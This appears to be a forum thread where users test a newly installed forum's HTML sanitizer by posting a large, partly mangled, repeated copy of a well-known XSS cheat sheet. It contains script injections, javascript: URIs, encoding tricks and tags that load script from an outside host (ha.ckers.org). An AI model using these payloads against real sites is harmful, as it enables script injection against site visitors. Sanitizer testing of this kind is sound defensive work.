JellyPotato (Warning, Should probably stay out.)
-
redacted - bz
-
@Matches
redacted -bzJelly
-
Now for some paging
-
Now for some paging
-
Now for some paging
-
redacted - bz
-
redacted - bz
-
redacted - bz
-
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
F
[omitted]
-
Dance for me <script>alert('Maybe')</script><scri%20pt>alert('idk')</script%>>
-
-
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
-
<form action="" method="GET"> <input id="query" name="query" value="Enter query here..." onfocus="this.value=''"> <input id="button" type="submit" value="Search"> </form>
-
Hum @Matches"/><img src=x onerror="
.jpg' />
<script>alert('testing')</script>
<body> Hello {{ USERNAME }}, view your Account. <script> var id = {{ USER_ID }}; alert("Your user ID is: " + id); </script> </body>
-
';alert(String.fromCharCode( »
88,83,83))//';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//";alert(String.fro »
mCharCode(88,83,83))//--></S »
CRIPT>">'><SCRIPT>alert(Stri »
ng.fromCharCode(88,83,83))</ »
SCRIPT>=&{}
-
=&{()}<BGSOUND »
<BASE » HREF="javascript:alert('XSS' » );//">
SRC="javascript:alert('XSS') »
;">
-
Locator
<script>alert('XSS')</SCRIPT » > SCRIPT w/Source File <SCRIPT » SRC=http://ha.ckers.org/xss. » js></SCRIPT> <p dir="auto">SCRIPT w/Char Code</p> <SCRIPT>alert(String.fromCha » rCode(88,83,83))</SCRIPT> <p dir="auto">BASE</p> <BASE » HREF="javascript:alert('XSS' » );//"> BGSOUND <BGSOUND » SRC="javascript:alert('XSS') » ;"> BODY background-image <BODY » BACKGROUND="javascript:alert » ('XSS');"> BODY ONLOAD <BODY ONLOAD=alert('XSS')> DIV background-image 1 <DIV » STYLE="background-image: » url(javascript:alert('XSS')) » "> <div></div> DIV background-image 2 <DIV » STYLE="background-image: » url(javascript:alert('XS » S'))"> <div></div> DIV expression <DIV STYLE="width: » expression(alert('XSS'));"> <div></div> FRAME <FRAMESET><FRAME » SRC="javascript:alert('XSS') » ;"></FRAMESET> IFRAME <IFRAME » SRC="javascript:alert('XSS') » ;"></IFRAME> INPUT Image <INPUT TYPE="IMAGE" » SRC="javascript:alert('XSS') » ;"> IMG w/JavaScript Directive <IMG » SRC="javascript:alert('XSS') » ;"> IMG No Quotes/Semicolon <IMG » SRC=javascript:alert('XSS')> IMG Dynsrc <IMG » DYNSRC="javascript:alert('XS » S');"> IMG Lowsrc <IMG » LOWSRC="javascript:alert('XS » S');"> IMG Embedded commands 1 <IMG » SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode"> <img » src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" /> somecommand.php?somevariables=maliciousc IMG STYLE w/expression exp/*<XSS » STYLE='no\xss:noxss("*//*"); » <p dir="auto">xss:ex/<em>XSS</em>//<em>/</em> »<br /> /pression(alert("XSS"))'><br /> exp/*<br /> exp/*<br /> List-style-image</p> <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE><UL><LI>XSS <ul><li>XSS</li></ul> XSS IMG w/VBscript <IMG » SRC='vbscript:msgbox("XSS")' » > LAYER <LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER> Livescript <IMG » SRC="livescript:[code]"> US-ASCII encoding scriptalert(XSS)/script » scriptalert(XSS)/script scriptalert(XSS)/script META <META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');"> META w/data:URL <META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K"> META w/additional URL parameter <META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');"> Mocha <IMG SRC="mocha:[code]"> OBJECT <OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT> OBJECT w/Embedded XSS <OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT> Embed Flash <EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED> STYLE <STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE> STYLE w/Comment <IMG » STYLE="xss:expr/*XSS*/ession » (alert('XSS'))"> STYLE w/Anonymous HTML <XSS » STYLE="xss:expression(alert( » 'XSS'))"> STYLE w/background-image <STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE><A » CLASS=XSS></A> <a class="XSS"></a> STYLE w/background <STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE> Stylesheet <LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );"> Remote Stylesheet 1 <LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css"> Remote Stylesheet 2 <STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE> Remote Stylesheet 3 <META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet"> Remote Stylesheet 4 <STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE> TABLE <TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE> TD <TABLE><TD » BACKGROUND="javascript:alert » ('XSS')"></TD></TABLE> XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> <p dir="auto"></C></X> »<br /> </xml><SPAN DATASRC=#I »<br /> DATAFLD=C DATAFORMATAS=HTML><br /> <IMG »<br /> SRC="javascript:alert('XSS') »<br /> ;"></p> <p dir="auto"><span></span><br /> <IMG SRC="javascript:alert('XSS');"><br /> XML data island w/comment <br /> <XML ID="xss"><I><B><IMG »<br /> SRC="javas<!-- » -->cript:alert('XSS')"></B>< »<br /> /I></XML></p> <p dir="auto"><SPAN »<br /> DATASRC="#xss" DATAFLD="B" »<br /> DATAFORMATAS="HTML"></SPAN><br /> <i><b><img src="javas" »<br /> alt="javas<!-- »<br /> -->cript:alert('XSS')" »<br /> /></b></i><span></span><br /> javas<!-- -->cript:alert('XSS')<br /> XML (locally hosted) <br /> <XML »<br /> SRC="<a href="http://ha.ckers.org/xss" rel="nofollow">http://ha.ckers.org/xss</a> »<br /> test.xml" ID=I></XML><br /> <SPAN »<br /> DATASRC=#I DATAFLD=C »<br /> DATAFORMATAS=HTML></SPAN><br /> <span></span><br /> XML HTML+TIME</p> <HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block <!--[if gte IE » 4]> <SCRIPT>alert('XSS');</S » CRIPT> <![endif]--> Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI <!--#exec cmd="/bin/echo » '<SCRIPT SRC'"--><!--#exec » cmd="/bin/echo » '=http://ha.ckers.org/xss.js » ></script>'"--> PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>
';alert(String.fromCharCode( »
88,83,83))//';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//";alert(String.fro »
mCharCode(88,83,83))//--></S »
CRIPT>">'><SCRIPT>alert(Stri »
ng.fromCharCode(88,83,83))</ »
SCRIPT>=&{}
';alert(String.fromCharCode( »
88,83,83))//';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//";alert(String.fro »
mCharCode(88,83,83))//--> »
">'>=&{}
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
XSS Quick Test
'';!--"<xss>=&{()}<br/> '';!--"=&{()}<br/> '';!--"=&{()}<br/> SCRIPT w/Alert()</xss><? echo('alert("XSS")'); »
<? echo('alert("XSS")'); ?>
?>JavaScript Includes
Character Encoding Example
<
%3C
<
<
<
<
< »<
<<
� »
060
<
<
<
& »
#0060;
<
<
&# »
0000060;
<
<
 »
c
<
<
� »
03c
<
<< »
<
<
� »
003c;
<
<
<
& »
#X0003c
<
< »<
<
<
&#X »
0003c;
<
< »
;
<<
<
� »
003C
<
<
&# »
x3C;
<
<
� »
3C;
<
<
& »
#X3C
<
<
< »<
<< »
;
<
<
< »<
<
\x3c »\x3C
\u003c
\u003C
<
%3C
<
<
&L »
T
<
<
<
<& »
lt;
<
<
<
<
< »<
<
<
<
<
&l »
t;
<
<
<
<
<
»<
<
<
<
<
&l »
t;
<
<
<
<
<
»
<
<
<
<
<
< »
;<
<
<
<
<
»
<
<
<
<
<
< »
;
<
<
<
<
<
& »
lt;<
<
<
<
< »
;
<
\x3c
\x3C
\u003c
\u00 »
3C
< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive
<IMG »
SRC=JaVaScRiPt:alert('XSS')>
HTML Entities
<IMG »
SRC=javascript:alert("X »
SS")>
Grave Accents
<IMG »
SRC=javascript:alert("RSnak » e says, 'XSS'")
>
<img »
src="%60javascript%3Aalert(" »
alt="javascript:alert(" » ;RSnake" />
javascript:alert("RSnake
Image w/CharCode
<IMG »
SRC=javascript:alert(String. »
fromCharCode(88,83,83))>
UTF-8 Unicode Encoding
<IMG »
SRC=java&# »
115;crip& »
#116;:ale& »
#114;t('X&# »
83;S')>
Long UTF-8 Unicode w/out Semicolons
<IMG »
SRC=ja� »
118as� »
99ri »
2t:a »
ler& »
#0000116('&# »
0000088SS� »
000039)>
DIV w/UnicodeHex Encoding w/out Semicolons UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab jav ascript:alert('XSS'); Embedded Encoded Tab jav ascript:alert('XSS'); Embedded Newline jav ascript:alert('XSS'); Embedded Carriage Return jav ascript:alert('XSS'); Multiline w/Carriage Returns p
t
:
a
l
e
r
t
(
'
X
S
S
' »)
"<img »
src="j%20a%20v%20a%20s%20c%2 »
0r%20i%20p%20t%20%3A%20a%20l »
%20e%20r%20t%20(%20'%20X%20S »
%20S%20'%20)" alt="j a v a s »
c r i p t : a l e r t ( ' X »
S" />
j a v a s c r i p t : a l e r t ( ' X S
Null Chars 1
<IMG »
SRC=java\0script:alert("XSS") »Null Chars 2
<BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript alert("XSS");//< < < Malformed IMG Tags <script>alert("XSS")</SC » RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » S</A> <a href="/">XSS</a> XSS Hex Encoding <A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. » 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>
&<SCR\0IPT>alert("XSS")</SCR\0 »
IPT>
&
&
Spaces/Meta Chars
Non-Alpha/Non-Digit
<SCRIPT/XSS »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Non-Alpha/Non-Digit Part 2
-
Just so you know, the source code for the HTML sanitizer is here:
-
<IMG »
SRC="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode"><img »
src="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode" »
alt="somecommand.php?somevar »
iables=maliciousc" />IMG Lowsrc
<IMG »
LOWSRC="javascript:alert('XS »
S');">
IMG Embedded commands 1
<IMG »
SRC="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode">
<img »
src="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode" »
alt="somecommand.php?somevar »
iables=maliciousc" />
-
What's the fun in that?
@ben_lubar Something broke in the big block from http://htmlpurifier.org/live/smoketests/xssAttacks.php - trying to figure out which combination caused it.
-
IMG Dynsrc
<IMG »
DYNSRC="javascript:alert('XS »
S');">
IMG Lowsrc
<IMG »
LOWSRC="javascript:alert('XS »
S');">
IMG Embedded commands 1
<IMG »
SRC="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode">
<img »
src="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode" »
alt="somecommand.php?somevar »
iables=maliciousc" />
somecommand.php?somevariables=maliciousc
-
-
IMG Embedded commands 1
<IMG »
SRC="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode">
<img »
src="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode" »
alt="somecommand.php?somevar »
iables=maliciousc" />
somecommand.php?somevariables=maliciousc
IMG STYLE w/expression
exp/<XSS »
STYLE='no\xss:noxss("//*"); »xss:ex/XSS/// »
<STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE>
/pression(alert("XSS"))'>
exp/*
exp/*
List-style-image- XSS
- XSS
TD
XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]></C></X> »
</xml><SPAN DATASRC=#I »
DATAFLD=C DATAFORMATAS=HTML>
<IMG »
SRC="javascript:alert('XSS') »
;">
XML data island w/comment
<XML ID="xss"><IMG »
SRC="javascript:alert('XSS')">< »
/I></XML><SPAN »
<HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>
DATASRC="#xss" DATAFLD="B" »
DATAFORMATAS="HTML">
<img src="javas" »
alt="javas<!-- »
-->cript:alert('XSS')" »
/>
javascript:alert('XSS')
XML (locally hosted)
<XML »
SRC="http://ha.ckers.org/xss »
test.xml" ID=I></XML>
<SPAN »
DATASRC=#I DATAFLD=C »
DATAFORMATAS=HTML>
XML HTML+TIME<? echo('alert("XSS")'); »
<? echo('alert("XSS")'); ?>
?>JavaScript Includes
Character Encoding Example
<
%3C
<
<
<
<
< »<
<<
� »
060
<
<
<
& »
#0060;
<
<
&# »
0000060;
<
<
 »
c
<
<
� »
03c
<
<< »
<
<
� »
003c;
<
<
<
& »
#X0003c
<
< »<
<
<
&#X »
0003c;
<
< »
;
<<
<
� »
003C
<
<
&# »
x3C;
<
<
� »
3C;
<
<
& »
#X3C
<
<
< »<
<< »
;
<
<
< »<
<
\x3c »\x3C
\u003c
\u003C
<
%3C
<
<
&L »
T
<
<
<
<& »
lt;
<
<
<
<
< »<
<
<
<
<
&l »
t;
<
<
<
<
<
»<
<
<
<
<
&l »
t;
<
<
<
<
<
»
<
<
<
<
<
< »
;<
<
<
<
<
»
<
<
<
<
<
< »
;
<
<
<
<
<
& »
lt;<
<
<
<
< »
;
<
\x3c
\x3C
\u003c
\u00 »
3C
< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive
<IMG »
SRC=JaVaScRiPt:alert('XSS')>
HTML Entities
<IMG »
SRC=javascript:alert("X »
SS")>
Grave Accents
<IMG »
SRC=javascript:alert("RSnak » e says, 'XSS'")
>
<img »
src="%60javascript%3Aalert(" »
alt="javascript:alert(" » ;RSnake" />
javascript:alert("RSnake
Image w/CharCode
<IMG »
SRC=javascript:alert(String. »
fromCharCode(88,83,83))>
UTF-8 Unicode Encoding
<IMG »
SRC=java&# »
115;crip& »
#116;:ale& »
#114;t('X&# »
83;S')>
Long UTF-8 Unicode w/out Semicolons
<IMG »
SRC=ja� »
118as� »
99ri »
2t:a »
ler& »
#0000116('&# »
0000088SS� »
000039)>
DIV w/UnicodeHex Encoding w/out Semicolons UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab jav ascript:alert('XSS'); Embedded Encoded Tab jav ascript:alert('XSS'); Embedded Newline jav ascript:alert('XSS'); Embedded Carriage Return jav ascript:alert('XSS'); Multiline w/Carriage Returns p
t
:
a
l
e
r
t
(
'
X
S
S
' »)
"<img »
src="j%20a%20v%20a%20s%20c%2 »
0r%20i%20p%20t%20%3A%20a%20l »
%20e%20r%20t%20(%20'%20X%20S »
%20S%20'%20)" alt="j a v a s »
c r i p t : a l e r t ( ' X »
S" />
j a v a s c r i p t : a l e r t ( ' X S
Null Chars 1
<IMG »
SRC=java\0script:alert("XSS") »Null Chars 2
<BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript alert("XSS");//< < < Malformed IMG Tags <script>alert("XSS")</SC » IMG Embedde RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » S</A> <a href="/">XSS</a> XSS Hex Encoding <A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. » 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>
&<SCR\0IPT>alert("XSS")</SCR\0 »
IPT>
&
&
Spaces/Meta Chars
Non-Alpha/Non-Digit
<SCRIPT/XSS »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Non-Alpha/Non-Digit Part 2
- XSS
-
This post is deleted!
-
Well, it's been hours since we switched to NodeBB and no one has found any obvious XSS exploits. So that beats Discourse.
-
@anonymous234 no, @Maciejasjmj found one.